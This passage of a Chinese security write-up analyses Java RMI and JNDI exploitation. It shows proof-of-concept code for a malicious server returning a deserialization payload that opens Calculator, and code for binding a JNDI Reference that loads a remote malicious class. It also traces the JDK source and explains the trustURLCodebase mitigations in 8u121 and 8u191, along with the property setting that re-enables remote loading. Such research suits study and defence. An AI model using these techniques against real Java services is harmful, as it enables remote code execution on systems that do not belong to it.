- </blockquote></div><p><span tabindex="-1" contenteditable="false" data-cke-widget-wrapper="1" data-cke-filter="off" class="cke_widget_wrapper cke_widget_inline cke_widget_image cke_image_nocaption cke_widget_selected" data-cke-display-name="图像" data-cke-widget-id="12" role="region" aria-label=" 图像 小部件"><img data-cke-saved-src="https://img-blog.csdnimg.cn/img_convert/2e96a4d55411c3937d7f4455b5bef658.png" src="https://img-blog.csdnimg.cn/img_convert/2e96a4d55411c3937d7f4455b5bef658.png" data-cke-widget-data="{"hasCaption":false,"src":"https://mmbiz.qpic.cn/sz_mmbiz_png/H6W1QCHf9dG3IRIwCQwibhggQLyM5Fp50P9EK1y9fFZVvLaQhWkZE2J6KpYCzg9vrF4gTZibMON9ib1PS4NT6LBRw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1","alt":"","width":"","height":"","lock":true,"align":"none","classes":[]}" data-cke-widget-upcasted="1" data-cke-widget-keep-attr="0" data-widget="image" class="cke_widget_element" alt=""><span class="cke_reset cke_widget_drag_handler_container" style="background: url("https://csdnimg.cn/release/blog_editor_html/release1.6.19/ckeditor/plugins/widget/images/handle.png") rgba(220, 220, 220, 0.5); top: -15px; left: 0px; display: block;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" src="" width="15" title="点击并拖拽以移动" height="15" role="presentation" draggable="true"></span><span class="cke_image_resizer" title="点击并拖拽以改变尺寸"></span></span></p><p>
- </p><h1><strong>0x04 服务端攻击客户端</strong></h1><hr><h2>
- </h2><p>分析完了客户端对服务端的攻击,我们来看一下 服务端对客户端的攻击,根据第二章RMI流程源码分析我们看到了,服务端如果想要攻击客户端,那么利用点就存在客户端反序列话服务端的返回值的时候。这时候需要将环境稍微修改一下。</p><p>其实很简单,先修改服务端的代码,我们将IHello接口中sayHello方法需要的参数删除,然后将返回值类型由String修改成Person类型。</p><div class="blockcode"><blockquote>
- package com.rmitest.inter;
- import com.rmitest.impl.Person;
- import java.rmi.Remote;
- import java.rmi.RemoteException;
- public interface IHello extends Remote {
- public Person sayHello()throws RemoteException;
- }
复制代码 HelloImpl也根据接口的要求进行修改- package com.rmitest.impl;
- import com.rmitest.inter.IHello;
- import com.rmitest.weakclass.Weakness;
- import java.rmi.RemoteException;
- import java.rmi.server.UnicastRemoteObject;
- public class HelloImpl extends UnicastRemoteObject implements IHello {
- public HelloImpl() throws RemoteException {
- }
- @Override
- public Person sayHello() {
- Weakness weakness = new Weakness();
- weakness.setParam("open /Applications/Calculator.app");
- weakness.setName("hack");
- return weakness;
- }
- }
同客户端攻击服务端时一样,只不过这次变成了服务端这边的Weakness类需要继承Person类了。 然后客户端这边就修改完毕。 然后我们来修改rmiregistry这边的代码,同样先修改IHello接口,然后我们需要将Person类拷贝到rmiregistry这边,不过一般在生产环境中,rmiregistry和服务端一般都是在同一台机器统一个项目文件里,所以服务端可以访问的类rmiregistry同样也可以。 紧接着就是就该客户端这边的代码,同理Weakness类不再继承Person
- public class RMICustomer {
- public static void main(String[] args) throws RemoteException, NotBoundException {
- IHello hello = (IHello) LocateRegistry.getRegistry("", 1099).lookup("Hello");
- Person person = hello.sayHello();
- }
- }
复制代码 如此一来就可以实现通过服务端去攻击客户端
0x05 服务端攻击客户端 2
- /**
- * This class represents a reference to an object that is found outside of
- * the naming/directory system.
- *<p>
- * Reference provides a way of recording address information about
- * objects which themselves are not directly bound to the naming/directory system.
- *<p>
- * A Reference consists of an ordered list of addresses and class information
- * about the object being referenced.
- * Each address in the list identifies a communications endpoint
- * for the same conceptual object. The "communications endpoint"
- * is information that indicates how to contact the object. It could
- * be, for example, a network address, a location in memory on the
- * local machine, another process on the same machine, etc.
- * The order of the addresses in the list may be of significance
- * to object factories that interpret the reference.
- *<p>
- * Multiple addresses may arise for
- * various reasons, such as replication or the object offering interfaces
- * over more than one communication mechanism. The addresses are indexed
- * starting with zero.
- *<p>
- * A Reference also contains information to assist in creating an instance
- * of the object to which this Reference refers. It contains the class name
- * of that object, and the class name and location of the factory to be used
- * to create the object.
- * The class factory location is a space-separated list of URLs representing
- * the class path used to load the factory. When the factory class (or
- * any class or resource upon which it depends) needs to be loaded,
- * each URL is used (in order) to attempt to load the class.
- *<p>
- * A Reference instance is not synchronized against concurrent access by multiple
- * threads. Threads that need to access a single Reference concurrently should
- * synchronize amongst themselves and provide the necessary locking.
- *
- * @author Rosanna Lee
- * @author Scott Seligman
- *
- * @see RefAddr
- * @see StringRefAddr
- * @see BinaryRefAddr
- * @since 1.3
- */
复制代码简单解释下该类的作用就是记录一个远程对象的位置,然后服务端将实例化好的Reference类通过bind方法注册到rmiregistry上,然后客户端通过rmiregistry返回的Stub信息找到服务端并调用该Reference对象,Reference对象通过URLClassloader将记录在Reference对象中的Class从远程地址上加载到本地,从而触发恶意类中的静态代码块,导致RCE 我们使用JDK 7u21作为环境来进行该利用方式的深入分析 首先看下服务端的代码
- public class RMIProvider {
- public static void main(String[] args) throws RemoteException, AlreadyBoundException, NamingException {
- //TODO 把resources下的Calc.class 或者 自定义修改编译后target目录下的Calc.class 拷贝到下面代码所示http://host:port的web服务器根目录即可
- Reference refObj = new Reference("ExportObject", "com.longofo.remoteclass.ExportObject", "");
- ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
- //尝试使用JNDI的API来bind,但是会报错
- // Context context = new InitialContext();
- // context.bind("refObj", refObjWrapper);
- Registry registry = LocateRegistry.getRegistry(1099);
- registry.bind("refObj", refObjWrapper);
- }
- }
复制代码可以看到在实例化Reference对象的时候会传递三个参数进去,这三个参数分别是 className 包含此引用所引用的对象的类的全限定名。(ps: 就是恶意类的类名或者全限定类名,经过测试该参数不是必须,为空也行,关键在于第二个参数 也就是classFactory) classFactory 包含用于创建此引用所引用的对象的实例的工厂类的名称。初始化为零。(ps: 第二个参数很重要 一定要写恶意类的全限定类名) classFactoryLocation 包含工厂类的位置。初始化为零。(ps: 也就是恶意类存放的远程地址) 接下来就来跟入源码看一看
- public Reference(String className) {
- this.className = className;
- addrs = new Vector();
- }
- ........
- public Reference(String className, String factory, String factoryLocation) {
- this(className);
- classFactory = factory;
- classFactoryLocation = factoryLocation;
- }
复制代码实例化Reference期间就只进行以上这些操作 实例化ReferenceWrapper的时候同样只进行了简单的赋值操作
- public ReferenceWrapper(Reference var1) throws NamingException, RemoteException {
- this.wrappee = var1;
- }
复制代码 接下来就是通过调用bind方法来将ReferenceWrapper对象注册到rmiregistry中。客户端bind Reference过程结束接下来看rmiregistry这边
这里呢因为 jdk7u21 和 jdk 8u20两个版本在调试的时候无法在RegistryImpl_Skel的dispatch方法上拦截断点所以 暂时采用jdk 8u221版本来进行演示
接下来来看客户端调用Reference这个远程对象的过程,客户端的代码演示环境为jdk 8u20
- public class RMICustomer {
- public static void main(String[] args) throws NamingException {
- //使用JNDI的方式来lookup远程对象
- new InitialContext().lookup("rmi://");
- }
- }
复制代码其实jndi的InitialContext().lookup() 底层和rmi自己的LocateRegistry.getRegistry().lookup()一样都是调用了RegistryImpl_Stub.lookup()方法但是jndi在此基础上又做了自己的封装,例如在处理rmiregistry返回的ReferenceWrapper_stub对象时,二者的处理方式就不相同。 rmi无法处理ReferenceWrapper_stub对象,而jndi在接收了rmiregistry返回的ReferenceWrapper_stub对象后,结束当前lookup方法,在其上一层的lookup方法中也就是RegistryContext.lookup()方法里会对返回的ReferenceWrapper_stub进行处理 来观察下RegistryContext.lookup()方法的具体内容
- public Object lookup(Name var1) throws NamingException {
- if (var1.isEmpty()) {
- return new RegistryContext(this);
- } else {
- Remote var2;
- try {
- //调用RegistryImpl_Stub.lookup()方法
- var2 = this.registry.lookup(var1.get(0));
- } catch (NotBoundException var4) {
- throw new NameNotFoundException(var1.get(0));
- } catch (RemoteException var5) {
- throw (NamingException)wrapRemoteException(var5).fillInStackTrace();
- }
- //反序列化的ReferenceWrapper_stub对象在该方法中被处理
- return this.decodeObject(var2, var1.getPrefix(1));
- }
- }
- private Object decodeObject(Remote var1, Name var2) throws NamingException {
- try {
- //判断返回的ReferenceWrapper_stub是否是RemoteReference的子类,结果为真,返回ReferenceWrapper_stub中的Reference对象
- Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;
- //接着对Reference对象进行操作
- return NamingManager.getObjectInstance(var3, var2, this, this.environment);
- } catch (NamingException var5) {
- public static Object
- getObjectInstance(Object refInfo, Name name, Context nameCtx,
- Hashtable<?,?> environment)
- throws Exception
- {
- ObjectFactory factory;
- ......
- //判断并接收Reference对象
- Reference ref = null;
- if (refInfo instanceof Reference) {
- ref = (Reference) refInfo;
- } else if (refInfo instanceof Referenceable) {
- ref = ((Referenceable)(refInfo)).getReference();
- }
- Object answer;
- if (ref != null) {
- String f = ref.getFactoryClassName();
- if (f != null) {
- // if reference identifies a factory, use exclusively
- // 这里会将Reference对象传入并且同时传入全限定类名
- factory = getObjectFactoryFromReference(ref, f);
- if (factory != null) {
- return factory.getObjectInstance(ref, name, nameCtx,
- environment);
- }
- // No factory found, so return original refInfo.
- // Will reach this point if factory class is not in
- // class path and reference does not contain a URL for it
- return refInfo;
- } else {
- // if reference has no factory, check for addresses
- // containing URLs
- answer = processURLAddrs(ref, name, nameCtx, environment);
- if (answer != null) {
- return answer;
- }
- }
- }
- // try using any specified factories
- answer =
- createObjectFromFactories(refInfo, name, nameCtx, environment);
- return (answer != null) ? answer : refInfo;
- }
复制代码根据观察NamingManager.getObjectInstance()方法的内部实现,关键代码在于这一段 factory = getObjectFactoryFromReference(ref, f); 跟进getObjectFactoryFromReference方法,
- static ObjectFactory getObjectFactoryFromReference(
- Reference ref, String factoryName)
- throws IllegalAccessException,
- InstantiationException,
- MalformedURLException {
- Class<?> clas = null;
- // Try to use current class loader
- try {
- //首先会尝试使用AppClassloder从本地加载恶意类,当然肯定是失败的
- clas = helper.loadClass(factoryName);
- } catch (ClassNotFoundException e) {
- // ignore and continue
- // e.printStackTrace();
- }
- // All other exceptions are passed up.
- // Not in class path; try to use codebase
- String codebase;
- if (clas == null &&
- //获取codebase地址
- (codebase = ref.getFactoryClassLocation()) != null) {
- try {
- //该方法内会实例化一个URlClassloader 并从codebase中的地址中的位置去请求并加载恶意类
- clas = helper.loadClass(factoryName, codebase);
- } catch (ClassNotFoundException e) {
- }
- }
- return (clas != null) ? (ObjectFactory) clas.newInstance() : null;
- }
复制代码可以看到真正负责从远程地址加载恶意类的是第二次的helper.loadClass(factoryName, codebase) 该方法的具体实现如下
- public Class<?> loadClass(String className, String codebase)
- throws ClassNotFoundException, MalformedURLException {
- //获取当前上下文的Classloader 也就是AppClassloader
- ClassLoader parent = getContextClassLoader();
- //实例化一个URLClassloader
- ClassLoader cl =
- URLClassLoader.newInstance(getUrlArray(codebase), parent);
- //去远程加载恶意类
- return loadClass(className, cl);
- }
复制代码这就是服务端攻击客户端的另一种方式,虽然本质上还是有rmi去访问rmiregistry获取的Reference对象,但是由于JNDI对rmi进行了又一次的封装导致两者对Reference对象的处理不一样,所以客户端只有在使用JNDI提供的方法去访问rmiregistry获取的Reference对象时才会触发RCE。 这个方法看上去好像很通用,在jdk 8u121版本之前确实如此,但是在jdk 8u121版本以及之后的版本中,此方法默认情况下就不再可用了,因为从jdk 8u121版本开始 增加了对com.sun.jndi.rmi.object.trustURLCodebase的值的校验,而该值默认为false,所以默认情况下想要通过Reference对象来远程加载恶意类的想法是行不通了, 我们来看一下jdk 8u121版本究竟为了防止远程加载恶意类做了哪些改动 首先在还没有通过rmi去到rmiregistry获取Reference对象之前,在RegistryContext这个类被加载的时候就执行了以下的静态代码
- static {
- PrivilegedAction var0 = () -> {
- return System.getProperty("com.sun.jndi.rmi.object.trustURLCodebase", "false");
- };
- String var1 = (String)AccessController.doPrivileged(var0);
- trustURLCodebase = "true".equalsIgnoreCase(var1);
- }
可以看到这里获取了com.sun.jndi.rmi.object.trustURLCodebase默认值为false 然后当执行进decodeObject()方法,并且准备执行NamingManager.getObjectInstance()方法之前多了以下判断
- if (var8 != null && var8.getFactoryClassLocation() != null && !trustURLCodebase) {
- throw new ConfigurationException("The object factory is untrusted. Set the system property 'com.sun.jndi.rmi.object.trustURLCodebase' to 'true'.");
- } else {
- return NamingManager.getObjectInstance(var3, var2, this, this.environment);
- }
复制代码就是判断了com.sun.jndi.rmi.object.trustURLCodebase的值,由于该值为false所以就会跑出异常中止执行 想要jdk 8u121版本能够正常远程加载就去要加上以下代码
- System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
复制代码这样就能又正常的RCE了 但是在JDK 8u191及以后的版本中客户端lookup以前加上上面的代码之后,从新执行会发现不报错了,但是仍然无法RCE,这是为什么呢,我们继续跟着源码往下看 在通过了RegistryContext中对com.sun.jndi.rmi.object.trustURLCodebase的判断并执行了NamingManager.getObjectInstance()方法之后,一路正常执行来到了关键的实例化URLClassloader并远程加载恶意类的最后一步,然后你就会发现这里变了
- public Class<?> loadClass(String className, String codebase)
- throws ClassNotFoundException, MalformedURLException {
- //此处有增加了一个对trustURLCodebase属性的一个判断,这个trustURLCodebase属性和RegistryContext类
- //中的trustURLCodebase属性完全不同
- if ("true".equalsIgnoreCase(trustURLCodebase)) {
- ClassLoader parent = getContextClassLoader();
- ClassLoader cl =
- URLClassLoader.newInstance(getUrlArray(codebase), parent);
- return loadClass(className, cl);
- } else {
- return null;
- }
- }
- private static final String TRUST_URL_CODEBASE_PROPERTY =
- "com.sun.jndi.ldap.object.trustURLCodebase";
- private static final String trustURLCodebase =
- AccessController.doPrivileged(
- new PrivilegedAction<String>() {
- public String run() {
- try {
- return System.getProperty(TRUST_URL_CODEBASE_PROPERTY,
- "false");
- } catch (SecurityException e) {
- return "false";
- }
- }
- );